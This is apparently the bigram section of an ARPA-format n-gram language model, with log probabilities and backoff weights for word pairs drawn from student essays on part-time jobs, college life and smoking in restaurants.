-2.0013952 need rather -0.048957378
-1.3874582 mind rather -0.048957378
-0.9930965 players rather -0.048957378
-3.2042007 , than -0.048957378
-1.8727539 less than -0.048957378
-2.6809804 college than -0.048957378
-0.991978 competitive than -0.048957378
-1.9030889 career than -0.048957378
-1.2995975 more than -0.099168696
-2.3376076 important than -0.048957378
-0.12995242 rather than -0.048957378
-0.6927047 specialisation than -0.048957378
-1.4644498 problems than -0.048957378
-0.6927047 story than -0.048957378
-0.6927047 possibility than -0.048957378
-1.9453988 restaurants than -0.048957378
-3.4479775 to sacrifice -0.048957378
-2.0508933 than sacrifice -0.048957378
-3.09512 <s> Despite -0.048957378
-3.4000094 the risks -0.048957378
-1.9214826 health risks -0.048957378
-2.0939517 -LRB- though -0.048957378
-2.110595 even though -0.048957378
-1.6438699 others though -0.048957378
-0.9942178 risks though -0.048957378
-1.293971 Even though -0.048957378
-2.2877035 be beneficial -0.187397
-2.7226624 job beneficial -0.048957378
-3.022964 is beneficial -0.048957378
-3.340304 , beneficial -0.048957378
-3.1159992 and beneficial -0.048957378
-2.1487668 but beneficial -0.048957378
-1.1688302 personally beneficial -0.048957378
-3.4650414 to imply -0.048957378
-2.710804 it just -0.048957378
-3.0052547 is just -0.048957378
-2.1770935 not just -0.048957378
-2.8054512 are just -0.048957378
-2.3610678 fs just -0.048957378
-1.7962554 responsibilities just -0.048957378
-1.8269229 income just -0.048957378
-0.6934062 tried just -0.048957378
-1.2541232 extra pocket -0.187397
-2.7131412 or pocket -0.048957378
-2.2439 <s> Some -0.08422062
-1.8373363 : Some -0.048957378
-3.340304 , possible -0.048957378
-2.5594692 from possible -0.048957378
-1.8268409 as possible -0.04895735
-2.4264548 all possible -0.048957378
-2.0860887 If possible -0.048957378
-1.5331545 quite possible -0.048957378
-1.7627151 always possible -0.048957378
-2.1262298 for those -0.04895735
-2.9937658 and those -0.048957378
-1.9401484 of those -0.25144583
-2.8145835 to those -0.048957378
-1.7545563 For those -0.048957378
-1.4637157 example those -0.048957378
-2.52561 from those -0.048957378
-2.1988974 help those -0.048957378
-1.5862222 earning those -0.048957378
-2.0217173 than those -0.048957378
-1.1667371 behind those -0.048957378
-0.69284487 Beware those -0.048957378
-3.284121 the final -0.048957378
-2.9605632 their final -0.048957378
-2.109144 This final -0.048957378
-2.3840747 my final -0.048957378
-1.4687891 My final -0.048957378
-2.8554769 for years -0.048957378
-1.6768808 several years -0.048957378
-3.0035503 the years -0.048957378
-2.1511497 college years -0.048957378
-0.805253 final years -0.187397
-0.9911411 precious years -0.048957378
-1.6343536 later years -0.048957378
-1.4596765 few years -0.048957378
-0.5842702 four years -0.048957378
-0.6922843 14 years -0.048957378
-1.1650699 3 years -0.048957378
-0.9911411 4 years -0.048957378
-0.6922843 senior years -0.048957378
-0.6922843 16 years -0.048957378
-1.1650699 40 years -0.048957378
-0.6922843 45 years -0.048957378
-2.9583905 , medicine -0.048957378
-3.2676826 of medicine -0.048957378
-2.6824691 with three -0.048957378
-1.7627151 For three -0.048957378
-2.7428439 have three -0.13618872
-1.060789 following three -0.187397
-2.8200238 are three -0.048957378
-1.6866118 give three -0.048957378
-1.1688302 Reason three -0.048957378
-3.2908964 a lesson -0.048957378
-2.4109652 life lesson -0.048957378
-2.63334 can before -0.048957378
-3.2450058 , before -0.048957378
-3.0156138 and before -0.048957378
-2.1980197 work before -0.187397
-2.5026238 money before -0.048957378
-2.0099201 activities before -0.048957378
-2.3730166 life before -0.048957378
-1.4657409 used before -0.048957378
-1.2906253 lifestyle before -0.048957378
-1.5877644 year before -0.048957378
-1.9283917 years before -0.048957378
-2.5843997 to enter -0.04895735
-1.945827 they enter -0.04895735
-1.5363102 graduates enter -0.048957378
-2.2811956 we enter -0.048957378
-2.1888087 it taste -0.187397
-3.2358162 a taste -0.048957378
-2.85306 the taste -0.187397
-2.045981 first taste -0.048957378
-2.6641047 can come -0.048957378
-3.2905889 to come -0.048957378
-2.9227278 students come -0.048957378
-2.3728426 may come -0.048957378
-2.2701116 who come -0.048957378
-2.3196363 would come -0.048957378
-1.1688302 shall come -0.048957378
-3.246793 and manage -0.048957378
-2.90557 to manage -0.04895735
-1.731922 n't manage -0.048957378
-2.920025 to secure -0.187397
-1.8612937 it means -0.11268411
-3.284121 the means -0.048957378
-2.762729 have means -0.048957378
-2.1987321 which means -0.048957378
-0.6938276 Independent means -0.048957378
-2.7659814 not relying -0.048957378
-2.0508933 than relying -0.048957378
-2.4177067 by organizations -0.048957378
-2.5949488 from organizations -0.048957378
-2.569465 <s> Perhaps -0.048957378
-3.09512 <s> Lastly -0.187397
-2.1525633 world lying -0.048957378
-0.69410884 lying beyond -0.048957378
-0.9947796 worlds beyond -0.048957378
-0.69410884 Anything beyond -0.048957378
-2.7567537 college gates -0.048957378
-2.5801177 student outside -0.048957378
-2.4608476 jobs outside -0.048957378
-2.411885 an outside -0.048957378
-2.346583 skills outside -0.048957378
-1.5875456 learned outside -0.048957378
-2.426685 people outside -0.048957378
-2.3771482 life outside -0.048957378
-1.8603683 living outside -0.048957378
-1.4646233 live outside -0.048957378
-1.1681993 opinions outside -0.048957378
-2.1524544 social circles -0.048957378
-2.6954308 will meet -0.048957378
-3.1764908 and meet -0.048957378
-2.384444 to meet -0.048957378
-2.380017 fs meet -0.048957378
-0.6938276 undoubtedly meet -0.048957378
-2.673552 a new -0.048957378
-2.7687883 the new -0.048957378
-2.0880997 This new -0.048957378
-1.1056151 something new -0.048957378
-2.0651627 learning new -0.048957378
-1.5292882 explore new -0.048957378
-1.0087806 meet new -0.048957378
-1.1671549 discover new -0.048957378
-1.9465262 our new -0.048957378
-1.2913141 creating new -0.048957378
-0.6929851 encountering new -0.048957378
-2.7665153 it offers -0.048957378
-2.2212014 work offers -0.048957378
-2.880715 be considered -0.048957378
-2.7556167 be against -0.048957378
-3.2669423 , against -0.048957378
-1.4646233 completely against -0.048957378
-2.4099944 experience against -0.048957378
-2.1054301 there against -0.048957378
-2.0274923 's against -0.048957378
-1.5302515 am against -0.13618872
-0.6931254 considered against -0.048957378
-0.99281657 absolutely against -0.048957378
-2.0326366 smoke against -0.048957378
-1.8640413 course load -0.048957378
-2.7759395 work load -0.048957378
-1.7703259 full load -0.048957378
-0.9944986 heavy load -0.048957378
-2.6721168 be much -0.048957378
-2.8253093 that much -0.048957378
-2.6295722 a much -0.048957378
-2.1969292 is much -0.04895735
-3.1325557 , much -0.048957378
-2.9119923 in much -0.048957378
-1.6189238 as much -0.11268411
-1.1700515 so much -0.11268411
-2.0406418 become much -0.048957378
-1.8369389 environment much -0.048957378
-1.914554 provide much -0.048957378
-1.1646541 Too much -0.048957378
-0.80194837 too much -0.048957378
-1.5246081 universities much -0.048957378
-0.99086237 dating much -0.048957378
-0.6921442 stem much -0.048957378
-0.6921442 cared much -0.048957378
-2.3941946 may hinder -0.048957378
-2.0508933 than hinder -0.048957378
-2.9787707 their performance -0.048957378
-1.9171832 academic performance -0.048957378
-0.69396824 improved performance -0.048957378
-0.69396824 efficient performance -0.048957378
-2.9793792 for books -0.048957378
-3.3677967 , books -0.048957378
-2.434089 their books -0.048957378
-2.5665698 from books -0.048957378
-1.2934115 needed books -0.048957378
-0.9939372 purchase books -0.048957378
-3.3047535 a hindrance -0.048957378
-2.1511729 I worked -0.04895735
-3.1159992 and worked -0.048957378
-2.2226734 only worked -0.048957378
-2.7428439 have worked -0.048957378
-1.1688302 myself worked -0.048957378
-1.0609009 never worked -0.048957378
-1.8844885 really worked -0.048957378
-2.076076 with my -0.048957378
-2.0822835 for my -0.04895735
-2.395548 is my -0.048957378
-2.906121 , my -0.048957378
-1.9430684 In my -0.048957378
-1.9844925 in my -0.048957378
-2.1217492 of my -0.048957378
-2.643432 to my -0.048957378
-1.6044186 on my -0.048957378
-1.8192497 pay my -0.048957378
-2.4177666 or my -0.048957378
-2.1998005 are my -0.048957378
-1.7658334 taking my -0.048957378
-1.5602907 put my -0.048957378
-2.2279565 when my -0.048957378
-0.98587745 Of my -0.048957378
-1.8271078 all my -0.048957378
-2.2198558 fs my -0.048957378
-2.044196 up my -0.048957378
-1.9464681 about my -0.048957378
-0.9990649 support my -0.13618872
-1.6504215 worked my -0.048957378
-1.5662853 did my -0.048957378
-1.6483629 balance my -0.048957378
-1.6111709 spent my -0.048957378
-1.8192497 had my -0.048957378
-1.5623918 spending my -0.048957378
-0.6896313 During my -0.048957378
-0.6896313 organize my -0.048957378
-0.98587745 reduces my -0.048957378
-0.98587745 throughout my -0.048957378
-0.98587745 remember my -0.048957378
-0.98587745 versus my -0.048957378
-0.6896313 voice my -0.048957378
-0.6896313 jeopardize my -0.048957378
-1.8306495 I did -0.04895735
-2.720708 not did -0.048957378
-1.2934115 nor did -0.048957378
-1.8862529 It did -0.048957378
-1.3895458 certainly did -0.048957378
-1.2934115 finally did -0.048957378
-1.8229574 I really -0.04895735
-2.0224233 often really -0.048957378
-3.1719224 to really -0.048957378
-2.2024024 only really -0.048957378
-1.8995479 ft really -0.048957378
-1.7566372 food really -0.048957378
-1.7183273 n't really -0.048957378
-2.3370237 fs really -0.048957378
-1.5283269 am really -0.048957378
-2.1197996 world really -0.048957378
-1.0594378 never really -0.048957378
-1.3861309 she really -0.048957378
-1.9802761 through until -0.048957378
-1.5914499 position until -0.048957378
-1.8312322 way until -0.048957378
-1.1692609 diligent until -0.048957378
-1.2928529 h until -0.048957378
-0.40924802 wait until -0.187397
-1.9584727 restaurants until -0.048957378
-1.3925304 last weeks -0.048957378
-1.1708648 lower workload -0.048957378
-2.4003265 my workload -0.048957378
-1.304172 I was -0.07613316
-2.710804 it was -0.048957378
-3.0886452 and was -0.048957378
-2.7389047 work was -0.048957378
-2.189597 which was -0.048957378
-2.228456 education was -0.048957378
-0.9933765 workload was -0.048957378
-1.762938 he was -0.048957378
-1.8678414 was huge -0.048957378
-2.6562068 can go -0.048957378
-2.698859 not go -0.048957378
-3.0886452 and go -0.048957378
-2.060793 to go -0.13332285
-2.9123535 students go -0.048957378
-2.1454496 you go -0.048957378
-1.4654101 must go -0.187397
-1.5321847 actually go -0.048957378
-2.7368789 I conclude -0.048957378
-3.4479775 to conclude -0.048957378
-2.4930472 part-time now -0.048957378
-3.0607083 is now -0.048957378
-2.4571307 people now -0.048957378
-0.9942178 conclude now -0.048957378
-1.4696376 adults now -0.048957378
-2.0587354 student needs -0.13618872
-1.8282994 cases needs -0.048957378
-1.9967362 financial needs -0.187397
-1.4667772 different needs -0.048957378
-1.8823773 really needs -0.048957378
-1.388153 basic needs -0.048957378
-1.8562627 Japan needs -0.048957378
-1.388153 his\/her needs -0.048957378
-2.5346918 the costs -0.187397
-3.1451926 and costs -0.048957378
-2.1955636 studying costs -0.048957378
-1.7661085 tuition costs -0.048957378
-0.9939372 increasing costs -0.048957378
-2.2342522 education costs -0.048957378
-3.2649243 a certain -0.048957378
-2.0292141 In certain -0.048957378
-3.4163227 to certain -0.048957378
-2.66203 I understand -0.187397
-2.678057 not understand -0.048957378
-2.8332193 to understand -0.048957378
-2.8923202 students understand -0.048957378
-2.3690348 also understand -0.048957378
-2.7762349 they understand -0.048957378
-2.009448 better understand -0.048957378
-2.153782 could understand -0.048957378
-2.3073826 would understand -0.048957378
-1.6367708 fully understand -0.048957378
-3.0111382 that matter -0.048957378
-3.2908964 a matter -0.048957378
-2.09718 spend every -0.048957378
-2.4571307 people every -0.048957378
-1.293971 Not every -0.048957378
-1.8618832 Japan every -0.048957378
-1.6432748 me every -0.048957378
-2.680345 can afford -0.048957378
-2.1868148 not afford -0.048957378
-3.3489213 to afford -0.048957378
-2.2224748 help afford -0.048957378
-1.8887417 really afford -0.048957378
-1.5383809 afford maintaining -0.048957378
-3.0230536 their son -0.048957378
-2.7186737 or daughter -0.048957378
-3.4479775 to dedicate -0.048957378
-1.4711709 entirely dedicate -0.048957378
-2.0457513 make him -0.048957378
-1.9176081 support him -0.048957378
-0.40941563 dedicate him -0.187397
-1.1700908 prepare him -0.048957378
-2.7186737 or herself -0.048957378
-1.9222482 ; moreover -0.048957378
-2.8890827 for getting -0.048957378
-2.926151 is getting -0.048957378
-3.2042007 , getting -0.048957378
-2.9729643 and getting -0.048957378
-2.35614 of getting -0.04895735
-3.1516366 to getting -0.048957378
-2.5191436 from getting -0.048957378
-2.7391284 are getting -0.048957378
-2.0018208 about getting -0.048957378
-2.0188582 than getting -0.048957378
-1.3846903 though getting -0.048957378
-1.6338902 just getting -0.048957378
-1.1663197 essentially getting -0.048957378
-3.246793 and higher -0.048957378
-2.7130423 of higher -0.048957378
-1.866194 getting higher -0.048957378
-3.644728 <s> Nevertheless -0.048957378
-3.102048 is extreme -0.048957378
-3.106568 in extreme -0.048957378
-1.6477528 rather extreme -0.048957378
-3.0452757 for maturing -0.048957378
-2.181358 could consume -0.048957378
-3.4204583 the momentum -0.048957378
-2.181358 could preciously -0.048957378
-2.9060166 are innumerous -0.048957378
-2.8461816 that hard -0.187397
-2.8981466 is hard -0.048957378
-3.0227573 the hard -0.048957378
-3.1669025 , hard -0.048957378
-2.934131 and hard -0.048957378
-3.0017767 of hard -0.048957378
-2.3004365 study hard -0.048957378
-2.1687486 studying hard -0.048957378
-1.5722067 very hard -0.048957378
-2.680841 work hard -0.048957378
-2.237141 so hard -0.048957378
-1.9284186 how hard -0.048957378
-1.2884092 demands hard -0.048957378
-1.2884092 becomes hard -0.048957378
-1.8678797 really hard -0.048957378
-3.4000094 the so-called -0.048957378
-3.014355 their so-called -0.048957378
-3.1764908 and back -0.048957378
-2.8507237 are back -0.048957378
-1.1696702 giving back -0.048957378
-1.9165361 think back -0.048957378
-0.6938276 run back -0.048957378
-3.2799814 and classrooms -0.048957378
-3.014355 their classrooms -0.048957378
-3.284121 the lack -0.048957378
-3.3489213 to lack -0.048957378
-2.3543274 The lack -0.048957378
-2.821667 they lack -0.048957378
-2.678043 or lack -0.048957378
-3.2676826 of power -0.048957378
-1.8378968 necessary power -0.048957378
-3.3813157 to concentrate -0.048957378
-1.9783378 should concentrate -0.048957378
-2.0473466 must concentrate -0.048957378
-1.4707885 instead concentrate -0.048957378
-2.4177067 by active -0.048957378
-2.4667776 an active -0.048957378
-0.995135 active role -0.048957378
-3.3624787 the process -0.048957378
-1.4704666 educational process -0.048957378
-2.0856535 learning process -0.048957378
-2.237829 some ! -0.048957378
-2.350965 more ! -0.048957378
-1.4629536 loans ! -0.048957378
-1.6346928 never ! -0.048957378
-1.2895159 labor ! -0.048957378
-1.1663197 soon ! -0.048957378
-1.2895159 wanted ! -0.048957378
-1.462143 habits ! -0.048957378
-0.991978 wrong ! -0.048957378
-0.6927047 guess ! -0.048957378
-1.2895159 properly ! -0.048957378
-0.6927047 Never ! -0.048957378
-0.6927047 unite ! -0.048957378
-3.0452757 for resting -0.048957378
-1.9702765 themselves acquiring -0.048957378
-1.5965295 knowledge exclusively -0.048957378
-2.9793792 for poor -0.048957378
-3.1828704 a poor -0.048957378
-3.3677967 , poor -0.048957378
-2.9430885 their poor -0.048957378
-0.9939372 mean poor -0.048957378
-2.090273 then poor -0.048957378
-3.102048 is participation -0.048957378
-2.1005187 then participation -0.048957378
-1.4704666 poor participation -0.048957378
-2.8176763 time dedicated -0.048957378
-1.8373363 A solution -0.048957378
-1.1708648 extreme solution -0.048957378
-2.4184146 more scholarships -0.048957378
-3.2908964 a government -0.048957378
-2.3605163 the government -0.11268411
-3.2085369 a system -0.048957378
-3.284121 the system -0.048957378
-0.6938276 enslavement system -0.048957378
-1.1696702 economic system -0.048957378
-0.6938276 healthcare system -0.048957378
-2.728165 and allow -0.048957378
-2.2018204 which allow -0.048957378
-2.332246 would allow -0.048957378
-1.536077 simply allow -0.048957378
-3.4163227 to practice -0.048957378
-1.5218441 into practice -0.13618872
-0.9947796 whole practice -0.048957378
-2.031715 In comparison -0.048957378
-3.1215048 in comparison -0.048957378
-2.0875707 that young -0.13618872
-2.0564344 a young -0.048957378
-2.967511 the young -0.048957378
-3.11635 , young -0.048957378
-2.0058713 often young -0.048957378
-1.7731812 many young -0.048957378
-2.0575187 any young -0.048957378
-3.0623753 to young -0.048957378
-2.6170933 on young -0.048957378
-2.1114051 -RRB- young -0.048957378
-1.3812549 Most young -0.048957378
-2.2648418 are young -0.048957378
-1.5825084 gives young -0.048957378
-1.6365912 help young -0.187397
-1.9307373 other young -0.048957378
-2.3681657 all young -0.048957378
-2.0495212 If young -0.048957378
-1.6737398 give young -0.048957378
-2.15471 as adults -0.187397
-1.5933044 responsible adults -0.048957378
-1.5214225 young adults -0.048957378
-1.2942703 mature adults -0.048957378
-0.6938276 younger adults -0.048957378
-1.9208251 They tend -0.048957378
-1.4714925 adults tend -0.048957378
-2.2247844 is always -0.04895735
-2.1368084 will always -0.187397
-1.8603685 not always -0.04895735
-2.9227278 students always -0.048957378
-2.8200238 are always -0.048957378
-1.7258272 n't always -0.048957378
-1.8569338 was always -0.048957378
-2.7186737 or specialisation -0.048957378
-2.7567537 college counterparts -0.048957378
-3.09512 <s> Generally -0.187397
-3.5096595 , non -0.048957378
-2.920025 to adapt -0.048957378
-3.2908964 a relatively -0.048957378
-3.4000094 the relatively -0.048957378
-2.983328 that short -0.048957378
-2.1588707 very short -0.048957378
-0.9944986 relatively short -0.048957378
-0.69396824 severely short -0.048957378
-2.7224927 a problem -0.048957378
-2.839973 the problem -0.048957378
-3.3971481 , problem -0.048957378
-2.3543274 The problem -0.048957378
-1.6435722 main problem -0.048957378
-2.6124525 , since -0.04895735
-2.7478716 work since -0.048957378
-1.5906644 graduate since -0.048957378
-1.2932827 wisely since -0.048957378
-1.8303851 day since -0.048957378
-1.3892777 clubs since -0.048957378
-1.2928529 approach since -0.048957378
-2.421319 this change -0.048957378
-3.1586366 a change -0.048957378
-2.677301 will change -0.048957378
-3.2905889 to change -0.048957378
-2.3728426 may change -0.048957378
-0.99365675 quickly change -0.048957378
-1.2928529 easily change -0.048957378
-2.4184146 more manageable -0.048957378
-2.859086 be concerned -0.048957378
-3.246793 and concerned -0.048957378
-2.7857137 work concerned -0.048957378
-1.894961 less sophisticated -0.048957378
-2.415659 more sophisticated -0.048957378
-3.4931862 , whilst -0.048957378
-2.8133025 time whilst -0.048957378
-0.995135 whilst furthering -0.048957378
-2.045974 valuable insight -0.048957378
-3.2102208 and insight -0.048957378
-1.469627 added insight -0.048957378
-0.69396824 pecuniary insight -0.048957378
-2.0331504 about assimilation -0.048957378
-2.1210358 This bridging -0.048957378
-3.2496762 the effect -0.048957378
-2.4390335 an effect -0.048957378
-1.3895458 immediate effect -0.048957378
-0.69368714 bridging effect -0.048957378
-0.69368714 detrimental effect -0.048957378
-0.69368714 definite effect -0.048957378
-2.7652595 job enables -0.048957378
-2.7857137 work enables -0.048957378
-2.02938 better enables -0.048957378
-2.152201 -RRB- quickly -0.048957378
-0.99501497 adapt quickly -0.048957378
-3.0230536 their leap -0.048957378
-2.2439 <s> Working -0.08422062
-1.8373363 : Working -0.048957378
-2.1888087 it teaches -0.048957378
-3.2102208 and teaches -0.048957378
-2.7949562 time teaches -0.048957378
-1.8906534 It teaches -0.187397
-3.0111382 that theory -0.048957378
-3.4000094 the theory -0.048957378
-2.941432 that universities -0.048957378
-3.1159992 and universities -0.048957378
-2.2156067 help universities -0.048957378
-1.7655468 Japanese universities -0.048957378
-1.3909848 based universities -0.048957378
-1.5902381 large universities -0.048957378
-0.99365675 U.S. universities -0.048957378
-2.1445498 will likely -0.048957378
-1.8911151 less likely -0.048957378
-2.1450179 most likely -0.048957378
-2.326847 are likely -0.187397
-2.0331504 about budgeting -0.048957378
-1.892832 work ethics -0.04895735
-3.0733142 a workplace -0.048957378
-2.5038946 the workplace -0.1722646
-3.2450058 , workplace -0.048957378
-3.0156138 and workplace -0.048957378
-3.0686293 of workplace -0.048957378
-2.864925 their workplace -0.048957378
-2.3173544 The workplace -0.048957378
-1.5858314 f workplace -0.048957378
-2.0117862 future workplace -0.048957378
-1.1671549 successful workplace -0.048957378
-1.7628887 understand workplace -0.048957378
-3.4931862 , productivity -0.048957378
-3.2799814 and productivity -0.048957378
-1.3925304 practical manner -0.048957378
-2.233106 these issues -0.048957378
-3.1451926 and instead -0.048957378
-2.5355608 working instead -0.048957378
-2.1961105 studies instead -0.048957378
-1.5920713 earning instead -0.048957378
-2.2342522 education instead -0.048957378
-0.69368714 tips instead -0.048957378
-3.4204583 the core -0.048957378
-3.2676826 of material -0.048957378
-1.2838528 course material -0.048957378
-3.0230536 their respective -0.048957378
-3.09512 <s> We -0.048957378
-0.995135 We hope -0.048957378
-3.014355 their principle -0.048957378
-2.3729722 The principle -0.048957378
-3.321535 the concern -0.048957378
-3.21812 of concern -0.048957378
-1.469627 major concern -0.048957378
-0.9944986 principle concern -0.048957378
-2.0607376 <s> But -0.07333779
-1.8391771 by definition -0.048957378
-3.2908964 a worker -0.048957378
-1.6920565 full-time worker -0.048957378
-2.7708824 it follows -0.048957378
-2.700248 with problems -0.048957378
-2.533118 money problems -0.048957378
-1.3366672 health problems -0.048957378
-0.6938276 serious problems -0.048957378
-0.6938276 respiratory problems -0.048957378
-2.541019 is perhaps -0.048957378
-2.6862712 will perhaps -0.048957378
-2.9179077 , perhaps -0.048957378
-2.933356 students perhaps -0.048957378
-2.6663196 or perhaps -0.048957378
-2.8351026 are perhaps -0.048957378
-3.1356838 a fully -0.048957378
-2.698859 not fully -0.048957378
-3.126527 of fully -0.048957378
-1.500062 become fully -0.048957378
-2.6437812 or fully -0.048957378
-2.8054512 are fully -0.048957378
-1.5896223 graduate fully -0.048957378
-1.5891323 perhaps fully -0.048957378
-3.1159992 and families -0.048957378
-2.1161668 their families -0.04895735
-2.1352663 most families -0.048957378
-1.7631377 Many families -0.048957378
-2.0027099 where families -0.048957378
-0.69354665 poorer families -0.048957378
-0.99365675 wealthy families -0.048957378
-2.7708678 <s> Others -0.04895735
-1.5961065 perhaps older -0.048957378
-2.7972748 have saved -0.048957378
-2.4503036 their courses -0.048957378
-0.69410884 college-level courses -0.048957378
-0.69410884 failing courses -0.048957378
-1.2958019 courses began -0.048957378
-2.722524 will fall -0.048957378
-2.9150915 to fall -0.048957378
-1.1710447 fall somewhere -0.048957378
-3.0267124 in between -0.048957378
-0.9933765 ground between -0.048957378
-0.6934062 span between -0.048957378
-1.683961 balance between -0.048957378
-1.5335814 choose between -0.048957378
-1.388153 choice between -0.048957378
-0.6934062 split between -0.048957378
-0.9933765 divided between -0.048957378
-1.8956895 little bit -0.048957378
-3.28005 of book -0.048957378
-2.968909 that hold -0.048957378
-2.0070503 employment hold -0.048957378
-3.3489213 to hold -0.048957378
-2.5414824 working hold -0.048957378
-2.5439303 should hold -0.048957378
-3.4479775 to escape -0.048957378
-2.4667776 an escape -0.048957378
-3.4204583 the confines -0.048957378
-2.30063 school worlds -0.048957378
-1.8670595 new worlds -0.048957378
-2.873293 be brought -0.048957378
-2.180893 has brought -0.048957378
-3.0607083 is far -0.048957378
-2.5414824 working far -0.048957378
-1.7055064 so far -0.048957378
-2.8507237 are far -0.048957378
-1.293971 fre far -0.048957378
-3.4650414 to dip -0.048957378
-3.0230536 their toes -0.048957378
-3.4204583 the unfathomable -0.048957378
-0.6942867 unfathomable waters -0.048957378
-1.6470779 fully immersed -0.048957378
-3.644728 <s> Thereby -0.048957378
-2.9583905 , preparing -0.048957378
-0.6942267 Thereby preparing -0.048957378
-3.4650414 to traverse -0.048957378
-2.8665538 the rest -0.50140065
-3.4163227 to rest -0.048957378
-1.1705118 proper rest -0.048957378
-3.2496762 the lives -0.048957378
-1.9203358 their lives -0.09038658
-2.5355608 working lives -0.187397
-2.0392778 's lives -0.048957378
-1.3835938 our lives -0.048957378
-1.3899099 daily lives -0.048957378
-3.644728 <s> Wages -0.048957378
-2.5982223 from gainful -0.048957378
-3.2908964 a sample -0.048957378
-2.9150915 to sample -0.048957378
-3.4204583 the delights -0.048957378
-2.0280838 often want -0.048957378
-2.8923202 students want -0.048957378
-2.3601093 may want -0.048957378
-1.7389883 they want -0.14912641
-2.1387856 you want -0.048957378
-2.2585382 who want -0.048957378
-1.9038341 ft want -0.048957378
-2.097815 parents want -0.048957378
-0.88480955 might want -0.187397
-2.2564893 we want -0.048957378
-2.90557 to try -0.048957378
-2.5549836 should try -0.048957378
-2.2860384 who try -0.048957378
-1.6757742 several things -0.048957378
-2.0105228 valuable things -0.048957378
-3.1325557 , things -0.048957378
-2.2980707 many things -0.048957378
-1.5793041 Such things -0.048957378
-2.6551435 have things -0.048957378
-1.671768 These things -0.048957378
-2.0396717 good things -0.048957378
-1.3765513 other things -0.048957378
-1.68146 difficult things -0.048957378
-1.3128718 these things -0.04895735
-2.0508218 out things -0.048957378
-1.8959295 those things -0.048957378
-1.2759765 new things -0.187397
-0.6921442 interesting things -0.048957378
-1.1646541 buy things -0.048957378
-0.6921442 obligatory things -0.048957378
-1.734036 were previously -0.048957378
-0.6942867 previously unavailable -0.048957378
-1.4298301 well rounded -0.048957378
-1.6465397 fully rounded -0.048957378
-2.1861243 it takes -0.048957378
-2.743439 job takes -0.048957378
-2.0659218 student takes -0.187397
-2.0804396 learning takes -0.048957378
-0.9942178 side takes -0.048957378
-2.1493602 will hopefully -0.048957378
-3.4931862 , hopefully -0.048957378
-2.6862712 will appreciate -0.048957378
-3.1451926 and appreciate -0.048957378
-2.5737934 to appreciate -0.13618872
-2.933356 students appreciate -0.048957378
-2.0207255 better appreciate -0.048957378
-1.16925 hopefully appreciate -0.048957378
-2.9060166 are paying -0.048957378
-3.4204583 the next -0.048957378
-3.4479775 to round -0.048957378
-0.99501497 next round -0.048957378
-3.28005 of drinks -0.048957378
-1.8328347 <s> Students -0.16934635
-3.2799814 and definitely -0.048957378
-2.165397 very definitely -0.048957378
-3.321535 the harder -0.048957378
-2.349459 study harder -0.048957378
-2.1138577 much harder -0.048957378
-1.6897244 worked harder -0.048957378
-2.7044797 can suffer -0.048957378
-3.4479775 to suffer -0.048957378
-3.644728 <s> Suffering -0.048957378
-2.7665153 it wo -0.048957378
-1.8377693 customers wo -0.048957378
-1.733866 n't kill -0.048957378
-2.569465 <s> Part -0.40449065
-2.859086 be fun -0.048957378
-2.1046717 having fun -0.048957378
-2.7835681 have fun -0.048957378
-2.7708678 <s> Jobs -0.04895735
-2.9060166 are mostly -0.048957378
-3.1764908 and basic -0.048957378
-2.1553595 very basic -0.048957378
-2.3718047 do basic -0.048957378
-0.6938276 mostly basic -0.048957378
-0.6938276 mastering basic -0.048957378
-3.3624787 the simple -0.048957378
-3.246793 and simple -0.048957378
-2.010357 doing simple -0.048957378
-3.284121 the tasks -0.048957378
-1.293971 small tasks -0.048957378
-0.58528477 simple tasks -0.048957378
-0.6938276 prioritize tasks -0.048957378
-0.9942178 perform tasks -0.048957378
-3.4931862 , suffering -0.048957378
-3.2799814 and suffering -0.048957378
-3.21812 of labor -0.048957378
-2.9787707 their labor -0.048957378
-1.1700908 menial labor -0.048957378
-0.69396824 manual labor -0.048957378
-1.733866 n't fatal -0.048957378
-1.6470779 But timing -0.048957378
-3.5120494 <s> Japan -0.048957378
-2.720708 not Japan -0.048957378
-1.4716873 in Japan -0.16310708
-3.3187766 to Japan -0.048957378
-1.8600016 like Japan -0.048957378
-1.2934115 including Japan -0.048957378
-2.5593464 in America -0.048957378
-0.4095183 North America -0.048957378
-3.0090466 for rent -0.048957378
-3.321535 the rent -0.048957378
-2.9385355 , rent -0.048957378
-0.69396824 monthly rent -0.048957378
-3.4931862 , married -0.048957378
-2.2787373 get married -0.048957378
-3.4860332 <s> generally -0.048957378
-2.6044638 student generally -0.048957378
-3.1159992 and generally -0.048957378
-2.7478716 work generally -0.048957378
-2.8200238 are generally -0.048957378
-1.8581281 Japan generally -0.048957378
-1.7266748 person generally -0.048957378
-2.814926 the freedom -0.048957378
-3.340304 , freedom -0.048957378
-3.0415518 in freedom -0.048957378
-2.6822872 of freedom -0.048957378
-2.4244723 experience freedom -0.048957378
-2.385586 more freedom -0.048957378
-1.2928529 With freedom -0.048957378
-3.4204583 the sophomore -0.048957378
-2.1525254 most sophomores -0.048957378
-3.4204583 the 4th -0.048957378
-3.2649243 a service -0.048957378
-1.1705118 community service -0.048957378
-1.1705118 customer service -0.048957378
-2.401619 fs prime -0.048957378
-3.2496762 the purpose -0.048957378
-1.0611942 main purpose -0.048957378
-0.69368714 prime purpose -0.048957378
-0.69368714 sole purpose -0.048957378
-1.16925 entire purpose -0.048957378
-0.69368714 ultimate purpose -0.048957378
-3.644728 <s> Cleaning -0.048957378
-0.6942867 Cleaning toilets -0.048957378
-2.7186737 or serving -0.048957378
-0.6942867 serving burgers -0.048957378
-2.709646 not waste -0.048957378
-1.467118 completely waste -0.048957378
-3.2905889 to waste -0.048957378
-1.7974223 real waste -0.048957378
-2.0363014 than waste -0.048957378
-1.5906644 complete waste -0.048957378
-0.69354665 Why waste -0.048957378
-1.2343968 I think -0.23072205
-2.709646 not think -0.048957378
-2.8627641 to think -0.048957378
-2.3863747 also think -0.048957378
-2.1488202 you think -0.048957378
-2.2701116 who think -0.048957378
-1.9103436 ft think -0.187397
-2.9652722 for anything -0.048957378
-3.340304 , anything -0.048957378
-2.362637 do anything -0.048957378
-2.0860887 If anything -0.048957378
-2.2601566 get anything -0.048957378
-2.075287 learning anything -0.048957378
-2.1933823 learn anything -0.048957378
-2.4754071 people argue -0.048957378
-2.3401537 would argue -0.048957378
-2.7708678 <s> Maybe -0.27955192
-3.3813157 to serve -0.048957378
-2.4044359 also serve -0.048957378
-2.2353065 only serve -0.048957378
-1.7690709 go serve -0.048957378
-2.7186737 or clean -0.048957378
-2.2786872 some dishes -0.048957378
-0.6942267 washing dishes -0.048957378
-3.0178597 that pales -0.048957378
-2.0889816 learning international -0.048957378
-3.321535 the law -0.048957378
